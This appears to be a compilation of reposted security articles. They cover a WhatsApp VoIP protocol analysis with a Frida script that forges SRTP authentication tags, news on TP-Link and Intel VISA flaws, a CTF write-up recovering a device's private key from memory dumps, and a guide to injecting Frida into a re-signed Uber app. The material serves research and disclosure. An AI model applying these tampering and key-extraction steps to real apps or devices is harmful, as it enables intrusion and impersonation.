message: 81 ca 00 07 83 42 f3 44 81 78 9f f5 39 b1 23 50 48 19 e0 f1 61 5b b5 32 dc b3 10 08 e7 47 a8 4b 80 00 00 01

tag_len: 10
message: 81 d0 00 02 83 42 f3 44 94 60 21 fe 80 00 00 02

tag_len: 4
message: 00 00 00 00

tag_len: 4
message: 00 00 00 00

tag_len: 10
message: 81 c8 00 12 fe 67 2e 32 87 b7 69 f8 5a 27 4c 76 b4 29 f6 5d 59 26 de af bd e9 4c 8b f3 ff 48 e3 a9 7e 62 cf db 9c 8a 3d 34 50 48 f8 fc 0e 88 7a 17 eb 17 94 9f 3d 91 27 89 d5 cc bd 21 ea 01 39 27 e1 05 07 66 69 1f 68 08 53 1a 18 02 9e bc 50 ed 8e 40 3e 8a 7b d3 b6 19 e8 54 6f 6b 58 ac 4e e3 25 f5 c2 e8 1c 97 bb 46 f9 38 45 80 00 00 03


There are two things I noticed:

  1. SRTP packets with a tag length of four bytes are authenticated incorrectly. The message parameter does not contain the actual SRTP packet. Instead, a constant value of four zero bytes is used for computing the authentication tag. However, when the tags of these packets are manipulated, the call is terminated after a few seconds. So either my observation that the authentication tag is computed incorrectly is wrong, or the packet manipulation I made was invalid (because it destroyed the packet encoding).
  2. Streams which are authenticated with a tag length of ten bytes seem to be authenticated correctly, i.e. the packets are passed to the srtp_hmac_compute function as the message parameter. Nevertheless, the authentication tags are not checked for integrity during a VoIP call session. The following code snippet shows how I overrode the authentication tags of SRTP packets which have an authentication tag of ten bytes:
const MANIPULATABLE_TAG_SIZE = 10;

// use a known Objective-C symbol as the start address for the memory scan
const scanStart = new ApiResolver("objc").enumerateMatches(
  "+[NSURL URLWithUnicodeString:]"
)[0].address;

console.log("search srtp_hmac_compute in memory from: " + scanStart);

const size = 100000;
const matches = Memory.scanSync(
  scanStart,
  size,
  // first bytes of the hexadecimal representation of srtp_hmac_compute
  "E0 03 16 AA 4C 00 00 94 D5 02 01 91"
);
const targetPtr = ptr(matches[0].address);
console.log("found srtp_hmac_compute at: " + matches[0].address);

const manipulatedTag = Memory.alloc(MANIPULATABLE_TAG_SIZE);
manipulatedTag.writeByteArray([0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0]);

Interceptor.attach(targetPtr, {
  onEnter: function (args) {
    // static srtp_err_status_t srtp_hmac_compute(void *statev,
    //                                            const uint8_t *message,
    //                                            int msg_octets,
    //                                            int tag_len,
    //                                            uint8_t *result)
    const tag_len = args[3].toInt32();
    console.log("srtp_hmac_compute tag (" + tag_len + "):");
    if (tag_len === MANIPULATABLE_TAG_SIZE) {
      console.log(hexdump(args[1], {
        length: args[2].toInt32()
      }));
      // redirect the result pointer so the real tag is written into our
      // zeroed buffer and the packet goes out with a manipulated tag
      args[4] = manipulatedTag;
    }
  }
});
When executing the Frida script at runtime, the VoIP call still works. Hence, integrity protection of these SRTP packets is broken. The consequences of this finding are unknown, since I could not reveal what these streams are actually used for. This behavior has to be analyzed more precisely.


This article revealed fundamental parts of the WhatsApp VoIP protocol. I demonstrated how the analysis of network traffic, binary application files and the dynamic runtime behavior of WhatsApp clients helped to reveal protocol steps.

The results of my analysis are the following:

  • WhatsApp applies open source libraries like libsignal-protocol-c, libsrtp, PJSIP and mbed TLS for implementing the VoIP protocol.
  • A value called “master secret” is used for initializing two SRTP streams, which encrypt payloads with AES-128-ICM. The master secret is used as input for a key derivation function (HKDF), which derives keys, salts and nonces as initialization parameters for SRTP.
  • The Noise Pipes Protocol, the Signal Protocol and XMPP interact for transporting the master secret to the callee for setting up a call session. The master secret is encrypted with the Signal Protocol, then packed into an XMPP message, which is encrypted with the Noise Pipes Protocol, and sent to a WhatsApp server. After that, the server passes the encrypted master secret to the callee for signaling an incoming call.
  • Integrity protection of VoIP calls seems to have flaws. This is because some SRTP streams are not checked for integrity. Moreover, there are streams which compute invalid authentication tags with zero bytes as input, instead of the actual SRTP packet.
  • SRTP packets do not reveal sensitive data, except the duration of a VoIP call session.
  • A malicious caller is able to manipulate the initial call message. This enables an attacker to confuse WhatsApp clients, so that the callee sees unintended caller information on his device. Social engineering attacks can be realized because of this vulnerability.

The conducted research faces several limitations. There are four streams which are initialized with encryption keys of unknown origin. In addition, I do not know where the keys for integrity protection of the SRTP streams come from.

To conclude, this article showed that it can be difficult for application developers to hide the implementation of mobile applications. Tools like Frida enable researchers and attackers to gather critical information about the implementation of mobile applications in a short amount of time. Application developers should bear in mind that cryptographic keys can easily be extracted with such tools. For impeding the dynamic analysis of an application, it is useful to strip symbol names from application binaries. Moreover, application developers should remove string constants, which contain critical application information or help to locate functions.


TP-Link ‘smart’ router proves to be anything but smart – just like its maker: Zero-day vuln dropped after silence

Original text by Thomas Claburn

TP-Link’s all-in-one SR20 Smart Home Router allows arbitrary command execution from a local network connection, according to a Google security researcher.

On Wednesday, 90 days after he informed TP-Link of the issue and received no response, Matthew Garrett, a well-known Google security engineer and open-source contributor, disclosed a proof-of-concept exploit to demonstrate a vulnerability affecting TP-Link’s router.

The 38-line script shows that you can execute any command you choose on the device with root privileges, without authentication. The SR20 was announced in 2016.

Via Twitter, Garrett explained that TP-Link hardware often incorporates TDDP, the TP-Link Device Debug Protocol, which has had multiple vulnerabilities in the past. Among them, version 1 did not require a password.

«The SR20 still exposes some version 1 commands, one of which (command 0x1f, request 0x01) appears to be for some sort of configuration validation,» he said. «You send it a filename, a semicolon and then an argument.»

Once it receives the command, says Garrett, the router responds to the requesting machine via TFTP, asks for the filename, imports it to a Lua interpreter, running as root, and sends the argument to the config_test() function within the imported file.

The Lua os.execute() method passes a command to be executed by an operating system shell. And since the interpreter is running as root, Garret explains, you have arbitrary command execution.

However, while TDDP listens on all interfaces, the default firewall prevents network access, says Garrett. This makes the issue less of a concern than the remote code execution flaws identified in TP-Link 1GbE VPN routers in November.

Even so, vulnerability to a local attack could be exploited if an attacker manages to get a malicious download onto a machine connected to an SR20 router.

TP-Link did not immediately respond to a request for comment.

Garrett concluded his disclosure by urging TP-Link to provide a way to report security flaws and not to ship debug daemons on production firmware.

Researchers discover and abuse new undocumented feature in Intel chipsets

Original text by Catalin Cimpanu

Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology.

At the Black Hat Asia 2019 security conference, security researchers from Positive Technologies disclosed the existence of a previously unknown and undocumented feature in Intel chipsets.

Called Intel Visualization of Internal Signals Architecture (Intel VISA), Positive Technologies researchers Maxim Goryachy and Mark Ermolov said this is a new utility included in modern Intel chipsets to help with testing and debugging on manufacturing lines.

VISA is included in the Platform Controller Hub (PCH) chipsets that are part of modern Intel platforms and works like a full-fledged logic signal analyzer.

Image: Wikimedia Commons

According to the two researchers, VISA intercepts electronic signals sent from internal buses and peripherals (display, keyboard, and webcam) to the PCH —and later the main CPU.


Unauthorized access to the VISA feature would allow a threat actor to intercept data from the computer memory and create spyware that works at the lowest possible level.

But despite its extremely intrusive nature, very little is known about this new technology. Goryachy and Ermolov said VISA’s documentation is subject to a non-disclosure agreement, and not available to the general public.

Normally, this combination of secrecy and a secure default should keep Intel users safe from possible attacks and abuse.

However, the two researchers said they found several methods of enabling VISA and abusing it to sniff data that passes through the CPU, and even through the secretive Intel Management Engine (ME), which has been housed in the PCH since the release of the Nehalem processors and 5-Series chipsets.


Goryachy and Ermolov said their technique doesn’t require hardware modifications to a computer’s motherboard and no specific equipment to carry out.

The simplest method consists of using the vulnerabilities detailed in Intel’s Intel-SA-00086 security advisory to take control of the Intel Management Engine and enable VISA that way.

«The Intel VISA issue, as discussed at BlackHat Asia, relies on physical access and a previously mitigated vulnerability addressed in INTEL-SA-00086 on November 20, 2017,» an Intel spokesperson told ZDNet yesterday.

«Customers who have applied those mitigations are protected from known vectors,» the company said.

However, in an online discussion after his Black Hat talk, Ermolov said the Intel-SA-00086 fixes are not enough, as Intel firmware can be downgraded to vulnerable versions where the attackers can take over Intel ME and later enable VISA.

Furthermore, Ermolov said that there are three other ways to enable Intel VISA, methods that will become public when Black Hat organizers publish the duo’s presentation slides in the coming days.

As Ermolov said yesterday, VISA is not a vulnerability in Intel chipsets, but just another way in which a useful feature could be abused and turned against users. Chances that VISA will be abused are low: if someone went through the trouble of exploiting the Intel-SA-00086 vulnerabilities to take over Intel ME, they would likely use that component to carry out their attacks rather than rely on VISA.

As a side note, this is the second «manufacturing mode» feature Goryachy and Ermolov found in the past year. They also found that Apple accidentally shipped some laptops with Intel CPUs that were left in «manufacturing mode.»

Insomni’Hack 2019 CTF – Perfectly Unbreakable Flag – 500

Original text by Phil

Challenge description

To our surprise, we found out that our challenge from last year has been counterfeited by another CTF.
Since we must protect our flag business as much as we can, we invested in the most secure technology around : the cloud™®©.
Since each device is uniquely fingerprinted, we are confident that our unclonable devices will be safe from those french knockoffs.

More info :
- If the board fails to connect to the cloud, perform a hard reset (ie. disconnect it completely before rebooting it)
- The cloud endpoint used to get the flag is /flag, in case you need to guess it

And a .tgz is given, containing the 3 firmwares of the 3 available boards:

$ ls -l
total 1376
-rwxrwxrwx 1 root root 287536 mars 27 2019 board-2.bin
-rwxrwxrwx 1 root root 287536 mars 27 2019 board-3.bin
-rwxrwxrwx 1 root root 287536 mars 27 2019 board-4.bin
-rwxrwxrwx 1 root root 545222 mars 22 18:17 firmwares-d1bd1fcbfb1fdef7678608460ed96b16074aae3f43ed052ebcc3e2724d7efc27.tgz
$ sha256sum board-*
aadc9e62ba75bda60b1412d0514bae00a28f51636c1291590e70c217bcf25a2f board-2.bin
27e7b7d39566bbdbd109a56e50f546681770ef3fad261118d64e1319ff0d53e7 board-3.bin
32682457545043f8611078d43549cf4414f9f0bd29700c1f2c42ad80d5013229 board-4.bin

Understanding what to do

As this challenge does not look trivial at all, I spent 15 minutes understanding the goal and the path to achieve it. All 3 boards are freely accessible on a desk beside the organisation team.

Picture of the board number 2

When you power up the device using the black USB cable, it starts running and shows activity on the network connector. As this device is a development board, the detachable left part is a ST-Link V2 ready to handle the right part of the board, composed of the main MCU and a few components. Connecting a PC to the USB port and running the official ST-Link utility gives you this trace:

19:53:18 : ST-LINK SN : 0669FF494849887767175629
19:53:18 : ST-LINK Firmware version : V2J29M18
19:53:18 : Connected via SWD.
19:53:18 : SWD Frequency = 4,0 MHz.
19:53:18 : Connection mode : Connect Under Reset.
19:53:18 : Debug in Low Power mode enabled.
19:53:18 : Device ID:0x419
19:53:18 : Device family :STM32F42xxx/F43xxx
19:53:18 : Can not read memory!
Disable Read Out Protection and retry.

The MCU is protected, but the ST-Link is unaltered and can be used.

Now let’s see if the virtual COM port (VCP) is mapped by the ST-Link for debugging purposes. Just start a terminal and RESET the board to have a look at the boot sequence:

Starting mbed-os-example-tls/tls-client
Using Mbed OS 5.11.5
Successfully connected to perfectlyunbreakable-cloud.insomni.hack at port 443
Starting the TLS handshake…
Successfully completed the TLS handshake
Server certificate:
cert. version : 1
serial number : 29:98:FB:FA:5B:65:0A:2D:15:E0:A4:BF:9B:06:6C:0B:1D:72:C8:8A
issuer name : C=CH, ST=Geneva, O=Insomni'hack
subject name : C=CH, ST=Geneva, O=Insomni'hack, CN=perfectlyunbreakable-cloud.insomni.hack
issued on : 2019-03-14 11:00:24
expires on : 2020-07-26 11:00:24
signed using : ECDSA with SHA256
EC key size : 256 bits

Certificate verification passed
Established TLS connection to perfectlyunbreakable-cloud.insomni.hack
HTTP: Received 175 chars from server
HTTP: Received '200 OK' status … OK
HTTP: Received message:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 22 Mar 2019 18:11:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 20
Connection: keep-alive

Cloud connection OK.


At this point, nothing else is possible over the serial port; it is impossible to send commands to the board.

The next check is to try to connect from a regular PC on the CTF LAN to the URL https://perfectlyunbreakable-cloud.insomni.hack/ and see what happens:

No way to connect to the « secure cloud »

To summarize: the goal is to connect to the https://perfectlyunbreakable-cloud.insomni.hack/flag URL. I can deduce that only the official boards can do it, because they hold a client-side certificate in their flash. So the only way to connect to /flag with a regular browser is to steal the private certificate key from the flash of the MCU and import it into the browser.

Let’s start the reverse

Check the difference between all the 3 firmwares

As the authors give you the 3 binary firmwares from the 3 running boards, it looks too simple to spot the certificate this way, but let’s try it.

The client side public certificate changes …
… and a few bytes too

The public certificate is the first difference, and the 32 bytes at offset 0x080437B0 are the second one. The second one is the most interesting, because it could have been the -----BEGIN PRIVATE KEY----- block, but that was not the case.
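The byte-level comparison can be reproduced with a few lines of Python; a sketch that reports differing flash addresses, using the 0x08000000 base address the firmware is flashed at:

```python
def diff_offsets(a: bytes, b: bytes, base: int = 0x08000000):
    """Return the flash addresses at which two firmware images differ."""
    return [base + i for i in range(min(len(a), len(b))) if a[i] != b[i]]

# usage with two of the dumped images, e.g.:
# with open("board-2.bin", "rb") as f1, open("board-3.bin", "rb") as f2:
#     for addr in diff_offsets(,
#         print(hex(addr))
```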

Let’s the long reverse start

Now it’s time to reverse the 281KB STM32 firmware file… And guess what, just to be sure to maximise the complexity of the task, let’s use a newcomer: Ghidra!

The tool is worth a look and, from my previous tests, the ARM Thumb decompiler was fine on all the examples I’ve tried.


Loading the firmware and giving Ghidra the correct target description at this first stage is mandatory. The STM32 used for the challenge is a STM32F42xxx/F43xxx (according to the previous ST-Link trace). Checking the reference guide for the instruction set points you to Cortex-M4. And if you dig more, you’ll find it’s the ARMv7E ISA. The mistake I made was to select the ARM v7 little endian target in Ghidra. The correct one is Cortex (thanks Balda for the correction):

Set the correct target

And do not forget to set the base address of the firmware:

0x08000000 comes from the reference guide


Now we need to find the public and private key in the firmware. For the public cert chain, it’s trivial: just look for the string « BEGIN CERTIFICATE »:



But now the complex things start: where the f*ck is the private key… At this point you have no choice but to understand how the HTTPS connection to the server is done. The first and winning idea is to go back to the serial log and try to identify the SDK used. At the beginning, « Mbed OS 5.11.5 » explicitly gives you the answer. Then, you need to dig more to work out how the TLS is done.

The interesting part is :

Starting the TLS handshake…
Successfully completed the TLS handshake

After a few minutes digging with Google, this PAGE gives you nearly the same trace I obtained through the serial interface. From this sample code found in the SDK, you can find your way in the firmware:

SDK: allocating the object « HelloHttpsClient »
Decompiled version

As I had never paid attention to reversing C++ code on an embedded target, I was puzzled by the pointer added to a method that has no parameters in the original source code. Ghidra is doing a good job, but you need to understand that the pointer renamed here « complexStruct » is in fact the this pointer of the current object instance.

Then, digging more into the TLS part is needed. According to the SDK, using a client private certificate means you need to call the function « mbedtls_ssl_conf_own_cert ». By searching the strings I found « mbedtls_ssl_conf_own_cert() returned -0x%04X » and a XREF. This code sets up the certificate pub/priv key pair:

Generation and setup of the private key

Now, it’s time to study the function genPrivateKey() and see how it works:

Computing the private key

The funniest part of the challenge is here. This code is nothing more than a bitwise AND between two offsets in memory. One in flash, OK, but the other one in a non-initialized SRAM zone! Now it’s time to have a look at the hint given during the CTF:

Fri Mar 22 2019, 22:20:22 [Perfectly Unbreakable Flag Hint]
The title acronym means something else in the hardware community!

« PUF » acronym. What? Google points to THIS page. My friend dok told me: « I know what it is, it’s something you can’t clone because it uses some physically unpredictable parameter ». In the current case, the PUF is the SRAM content at boot. 64 bytes are used as the private key. But, as some bits flip within those 64 bytes during the power-up sequence, another 64-byte table is used as a mask, keeping only the bits with stable states and discarding the flipping ones. This technique requires booting the board a huge number of times to monitor the state of the 8×64 bits and keep only the stable ones. That’s a REALLY GOOD TRIX!
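The stable-bit masking can be illustrated in a few lines of Python: record the SRAM bytes over many boots and keep only the bits that never flip (all dump values below are synthetic):

```python
def stability_mask(dumps):
    """Bitmask of SRAM bits that held the same value across all boot dumps."""
    ref = dumps[0]
    mask = bytearray(b"\xff" * len(ref))
    for d in dumps[1:]:
        for i in range(len(ref)):
            mask[i] &= ~(d[i] ^ ref[i]) & 0xFF   # clear every bit that flipped
    return bytes(mask)

dumps = [b"\xe6\x20", b"\xe7\x20", b"\xa6\x21"]  # three synthetic boots
mask = stability_mask(dumps)
key_bytes = bytes(d & m for d, m in zip(dumps[0], mask))  # stable bits only
```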


Now I need to dump the content of SRAM3, forgotten during the first dump. It’s quite easy, even with the protection fuse set. You just need to connect your PC, run the ST-Link utility and press « connect », then hit RESET on the target: at the very first moment of the boot you can dump the whole SRAM zone, even though the debug port is closed.

With the memory dump and the flash dump, here is the code that computes and displays the private key:

sram = "\x09\xE6\xF1\x20\x32\xE2\x38\xDD\xCF\x29\x27\x7F\x6F\xEB\x76\x34\x40\xC4\x44\xDC\xCA\xCD\x3B\x87\x0B\xAB\xE1\xB8\xE8\x80\x7B\x9B\x3B\xAA\xD5\x04\x61\xCA\xA2\x91\x66\x32\x49\xDF\xE5\x42\x98\xF5\x98\xB2\x37\x7E\x7E\xEB\xFD\x2E\xAB\xC1\x9F\x5A\xC0\xE3\xFF\xD9"
flash = "\x59\x3D\x32\xFE\x47\xA5\x4A\x85\x88\x35\x4E\x27\x63\x49\x37\xB6\xFF\x1B\xBE\xC2\xCE\x63\x95\xAB\x30\x3F\x77\x9D\x59\xD3\xE2\x75\xDD\xFF\x1E\x03\x2E\xF1\xEE\xE1\x52\xE8\xAA\x8B\x0E\x9D\xFA\xEA\x4E\x3D\x79\x0C\xD7\xEB\xBD\x7E\x73\x35\x9E\x5B\xBE\x5D\x42\xD7"

res = []
for x in range(len(sram)):
    res.append(ord(sram[x]) & ord(flash[x]))
print("Private key = ", res)

Private key = [9, 36, 48, 32, 2, 160, 8, 133, 136, 33, 6, 39, 99, 73, 54, 52, 64, 0, 4, 192, 202, 65, 17, 131, 0, 43, 97, 152, 72, 128, 98, 17, 25, 170, 20, 0, 32, 192, 162, 129, 66, 32, 8, 139, 4, 0, 152, 224, 8, 48, 49, 12, 86, 235, 189, 46, 35, 1, 158, 90, 128, 65, 66, 209]

At this point it was 3h56 in the morning. My first thought was: « shit, I’m just 10 minutes short of generating the private key and solving the challenge ».


As it’s always a big disappointment not to finish a challenge in time, I continued at home to solve it. But I was wrong: it was far more complex to finish the reverse up to the flag, and the 10 minutes turned into another 4 hours of work.

After obtaining the bits from SRAM who doesn’t flip, you need to reverse this:

Unknown hash function

And the funny stuff is for example:

no way to understand what’s running here…

This one doesn’t decompile, and the ASM view is not so clear. My guess was that this is an interrupt hook to an external crypto engine that runs a cryptographic function in a few cycles.

To help identify the function, I downloaded an official TLS library from Mbed: mbedtls-2.16.0-apache.tgz. With this reference source code, the unknown function can be commented and becomes a little bit more readable:

a clean SHA256 code

If you think it’s trivial now, you’re right, but with the solution in front of your eyes it’s much easier, believe me. So the unknown part of the private key becomes:

import hashlib
from array import array

sram = "\x09\xE6\xF1\x20\x32\xE2\x38\xDD\xCF\x29\x27\x7F\x6F\xEB\x76\x34\x40\xC4\x44\xDC\xCA\xCD\x3B\x87\x0B\xAB\xE1\xB8\xE8\x80\x7B\x9B\x3B\xAA\xD5\x04\x61\xCA\xA2\x91\x66\x32\x49\xDF\xE5\x42\x98\xF5\x98\xB2\x37\x7E\x7E\xEB\xFD\x2E\xAB\xC1\x9F\x5A\xC0\xE3\xFF\xD9"
flash = "\x59\x3D\x32\xFE\x47\xA5\x4A\x85\x88\x35\x4E\x27\x63\x49\x37\xB6\xFF\x1B\xBE\xC2\xCE\x63\x95\xAB\x30\x3F\x77\x9D\x59\xD3\xE2\x75\xDD\xFF\x1E\x03\x2E\xF1\xEE\xE1\x52\xE8\xAA\x8B\x0E\x9D\xFA\xEA\x4E\x3D\x79\x0C\xD7\xEB\xBD\x7E\x73\x35\x9E\x5B\xBE\x5D\x42\xD7"

res = []
for x in range(len(sram)):
    res.append(chr(ord(sram[x]) & ord(flash[x])))
res = array('B', map(ord, res)).tostring()

print("Private key = ", res)
print("sha256 = ", hashlib.sha256(res).hexdigest())

$ python
Private key = b"\t$0 \x02\xa0\x08\x85\x88!\x06'cI64@\x00\x04\xc0\xcaA\x11\x83\x00+a\x98H\x80b\x11\x19\xaa\x14\x00 \xc0\xa2\x81B \x08\x8b\x04\x00\x98\xe0\x0801\x0cV\xeb\xbd.#\x01\x9eZ\x80AB\xd1"
sha256 = 8e140886f96ef269e736cb1fe24ea12627df6971f32d6c15b6cbc2810af19382

Fake the board and grab the flag

Now it’s time to do a little bit of crypto. EDIT: no, not a little! I have something that looks like the private key and the full certificate chain. I need to craft a correct certificate so I can deploy it and visit the /flag URL. If you wonder how I can do that after the CTF, you’re right: I asked the creators of the challenge for the Docker files to run it here and finish the work.

First, craft the private key. For this one you need to generate the correct ECC private + public key file in .pem format. I never found a regular way to do it, due to my lack of knowledge in certificate/key manipulation. Thanks to Sylvain for correcting my silly Python code. Using an enhanced Python crypto lib is needed; I used Pycryptodome.

$ pip install pycryptodome

$ cat
from Crypto.PublicKey import ECC

e=ECC.construct(curve="prime256v1", d=0x8e140886f96ef269e736cb1fe24ea12627df6971f32d6c15b6cbc2810af19382)

print e.export_key(format="PEM")

$ python2 > privateKey.pem
$ cat privateKey.pem

Now you need to concatenate the 2 public certificates found in the flash of the board in a file called « chain.pem ». And finally generate a single file with all the stuff to import it on a regular browser:

$ openssl pkcs12 -inkey privateKey.pem -in chain.pem -export -out personnal.pfx

$ openssl pkcs12 -info -in personnal.pfx
Enter Import Password:
MAC: sha1, Iteration 2048
MAC length: 20, salt length: 8
PKCS7 Encrypted data: pbeWithSHA1And40BitRC2-CBC, Iteration 2048
Certificate bag
Bag Attributes
localKeyID: 95 5D 33 B2 38 0B 4C CE FC 46 DD 1C 55 17 63 45 5A 7A 17 82
subject=C = CH, ST = Geneva, O = Insomni'hack, CN = board-2.insomni.hack
issuer=C = CH, ST = Geneva, O = Insomni'hack
Certificate bag
Bag Attributes:
subject=C = CH, ST = Geneva, O = Insomni'hack
issuer=C = CH, ST = Geneva, O = Insomni'hack
PKCS7 Data
Shrouded Keybag: pbeWithSHA1And3-KeyTripleDES-CBC, Iteration 2048
Bag Attributes
localKeyID: 95 5D 33 B2 38 0B 4C CE FC 46 DD 1C 55 17 63 45 5A 7A 17 82
Key Attributes:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

One fuckin’ thing to know: if you don’t set a password on your .pfx file, Firefox will silently fail to import it.

Another funny thing: at this point you don’t know if there is more computation on the 32 bytes used to generate the private key. The firmware is so huge that you can’t check all functions between the last key manipulation and the TCP connect to the HTTPS port. You just need to try and pray…

Now you just need to connect to the super-secure cloud with the fake credz:

The extracted certificate roxx !!!

And now you just need to grab the flag:

The flag, hum

No, not exactly the flag …

Finish him


I was wondering about the need for this last step, which cost Marius (@nSinusR) from Tasteless (@TeamTasteless) the flag. Yes, Marius reached this point at 3h55 during the CTF. It’s the difference between skilled teams and amateurs. As we have access to the boards and the firmware, it would have been possible to patch the board to connect directly to the URL https://perfectlyunbreakable-cloud.insomni.hack/flag instead of https://perfectlyunbreakable-cloud.insomni.hack during the boot sequence. So the last step involves the private key you used to generate the certificate, as a proof of work. To decrypt the AES-CBC I used OpenSSL:

$ hexdump -C flag.enc 
00000000 0f b8 b7 c7 53 8e 1e 20 93 ea 93 13 e3 08 9f 46 |….S.. …….F|
00000010 1e cb 13 8e 42 28 d0 46 52 39 27 28 09 15 2a cf |….B(.FR9'(..*.|
$ openssl enc -aes-256-cbc -d -in flag.enc -K '8e140886f96ef269e736cb1fe24ea12627df6971f32d6c15b6cbc2810af19382' -iv '00000000000000000000000000000000'


I personally go to Insomni’Hack CTF for one thing: the hardware challenges. This year, 2 challenges were there for our pleasure. The first one from @_noskill, currently an intern at SCRT, was cool and a good warm-up (write-up from Sylvain of DUKS HERE). And this « monster » from Balda & Sylvain.

I must say this challenge kept me busy during the whole CTF. I learned a technique I had never seen before; the PUF concept is really funny and, I guess, used IRL. Solving a task close to a real project is far more exciting, and it was the case here! Using Ghidra was a good experience; I’ll do it again and hope to forget IDA-PRO ASAP to focus only on this wonderful open-source tool.


A little regret on this one is that the description did not mention the « crypto » category. With a more accurate description I would not have tried it alone, and I would have asked other members of the team for help at the very first moment of the CTF. And the complexity was too much for a 10-hour CTF, so the task wasn’t solved by anyone by 4h00. To be honest, without the help of the designers, I would not have been able to solve it, even afterwards (I guess I would have ragequit() before the flag).

The troll


From the description, « To our surprise, we found out that our challenge from last year has been counterfeited by another CTF. » is well sent. Last year I solved the hardware challenge in 3 minutes, because the flash read protection fuse on the STM32 had been forgotten (write-up HERE). In November 2018, Balda got a kind word at the GreHack CTF on the first hardware challenge:

"An Insomni'Hack 2018 tribute":
Was a 400 points at Insomni'hack and is only a 50 points at GreHack ... with the good tools ( Hello Baldanos  )

This year you win, so 1 – 1. See you the 15th of November for the next edition of GreHack  .

Credits & Greetings

Nice challenge by Baldanos (@Baldanos) and Sylvain (@Pelissier_S). Thanks for your time and the technical trix on Ghidra during the CTF. Big up guyz!


Thanks to Azox (@8008135_) for helping me at… 3h25! Pretty sure that together we would have solved it in time, bourricot!

Thanks to Marius (@nSinusR) from Tasteless (@TeamTasteless) for review & suggestions on this write-up.


And also thanks to the SCRT team, especially Michael (@0xGrimmlin) for making things possible  . See you next year!

Write-up by Phil (@PagetPhil) 27/03/2019

Setting up Frida Without Jailbreak on devices running Latest iOS 12.1.4

Original text by Dinesh Shetty

In the majority of penetration tests or bug-bounty engagements, you might encounter customers who limit the scope of testing to non-jailbroken devices running the latest mobile OS. How do you dynamically instrument the application in those cases? How do you trace the various functionalities of the application while trying to attack the actual application logic?

Frida is a runtime instrumentation toolkit for developers, reverse-engineers, and security researchers that allows you to inject your own script into a blackbox mobile application. Normally, Frida is installed and run on jailbroken devices; that process is pretty straightforward. However, the complexity increases when you want to run it on non-jailbroken devices. In this article I’ll explain in detail the steps to follow to get Frida running on the latest non-jailbroken version of iOS, viz. iOS 12.1.4.

The only requirement at this stage is an unencrypted IPA file. This is normally provided by the customer. If not, we can download the IPA file from the AppStore and then use tools like Clutch or bfinject to decrypt it. Alternatively, unencrypted versions of IPA files are also available online. Ensure that you do a checksum check and verify it with the customer before you start testing. Don’t be shocked if you find that IPA files from such websites have been modified to include unintended code. In our case, let’s target the Uber application from the AppStore.

The various steps for setting up Frida to run on non-jailbroken iOS device are:

1) Setting up the Signing Identity

2) Setting up Mobile Provision File

3) Performing the Actual Patching

4) Fixing Codesign issues

5) Performing the required Frida-Fu

I will take you through each of these steps one-by-one.

Setting up the Signing Identity

a) Launch Xcode and navigate to the Accounts section using the Preferences menu item. Make sure you are logged in to Xcode using your Apple account.

b) Select “Agent” and Click Manage Certificates.

c) Click + and select “iOS Development”.

d) To verify that the identity is properly set up, you can use the following command:

security find-identity -p codesigning -v

This command will output all the signing identities for your account.

Setting up Mobile Provision File

a) The next step is to create a new Xcode project with the team set to Agent and the target set to your actual test device, then build and run the application on the device. You have to do this step for every new device that you want to use for testing.

b) Right click the generated .app file and select “Show in Finder”.

c) Right click the .app file from the Finder and select “Show Package Contents”.

d) Save the embedded.mobileprovision file. You will need this later while signing the IPA file.

Performing the Actual Patching

a) Download the latest version of Frida. This can be done using the following command:

curl -O

b) Unzip the IPA file and copy this Frida library into the folder named “Frameworks”. If the folder “Frameworks” does not exist, create it.

unzip Uber.ipa
cp FridaGadget.dylib Payload/

c) Now, we will use the insert_dylib tool by Tyilo to inject the Frida dylib into the Uber Mach-O binary executable.

Use the following steps to build the insert_dylib tool.

git clone
cd insert_dylib
xcodebuild

d) The executable can now be found at “build” folder. Copy the generated insert_dylib executable to your system path using the following command:

cp insert_dylib/build/Release/insert_dylib /usr/local/bin/insert_dylib

e) Use the following command to inject the Frida dylib into your Uber Mach-O binary executable

insert_dylib --strip-codesig --inplace '@executable_path/Frameworks/FridaGadget.dylib' Payload/

If we try to install the application now, it will fail because of code-signing issues. We need to fix that before we proceed.

Fixing Codesign issues

a) Sign the Frida dylib using codesign. This can be done using the following command.

codesign -f -v -s  5E25E<snipped-signing-identity> Payload/

b) Zip the Payload folder into an IPA file using the following command:

zip -qry patchedapp.ipa Payload

c) Install `applesign` utility using the following command:

npm install -g applesign

d) Now, sign the patched IPA file that we created previously.

applesign -i 5E25E<snipped-signing-identity> -m embedded.mobileprovision -o patched_codesign.ipa patchedapp.ipa

e) Install ios-deploy and then push the patched_codesign IPA file to the device.

npm install -g ios-deploy
mkdir final_file
cp patched_codesign.ipa final_file
cd final_file
unzip patched_codesign.ipa
ios-deploy --bundle Payload/*.app --debug -W

Observe that the console message indicates that Frida is now running on port 27042.


Your iOS device will appear to be frozen until you enter the Frida commands. To confirm that the Frida gadget is actually working, use the following command:

frida-ps -Uai
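If frida-ps is not handy, a plain TCP connect also tells you whether the gadget's listener (port 27042 by default) is up, assuming you have forwarded the device port to your host, for example with iproxy. Below is a minimal sketch using a hypothetical `port_is_open` helper; the demo probes a local throwaway listener instead of a real device:

```python
import socket

def port_is_open(host, port, timeout=2.0):
    """Return True if a TCP connection to (host, port) succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# Against a real device you would probe the forwarded gadget port, e.g.:
#   port_is_open("127.0.0.1", 27042)

# Self-contained demo: open a local listener and probe it instead.
server = socket.socket()
server.bind(("127.0.0.1", 0))
server.listen(1)
_, demo_port = server.getsockname()
reachable = port_is_open("127.0.0.1", demo_port)
server.close()
print(reachable)
```

A successful connect only proves something is listening; frida-ps remains the authoritative check that it is actually the Frida gadget.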

Connect to the Gadget using:

frida -U Gadget

Trace Crypto calls using:

frida-trace -U -i "*Crypto*" Gadget

The following shows sample usage of a Frida script:

frida -U -l list-classes.js Gadget

That is all I have for this article. In later articles we will talk about how to use Frida to perform a variety of attacks on Mobile Applications.

Hacking Jenkins Part 2 — Abusing Meta Programming for Unauthenticated RCE!

Original text by orange

Hello everyone!

This is the Hacking Jenkins series part two! For those people who still have not read part one yet, you can check the following link to get some basics and see how vulnerable Jenkins’ dynamic routing is!

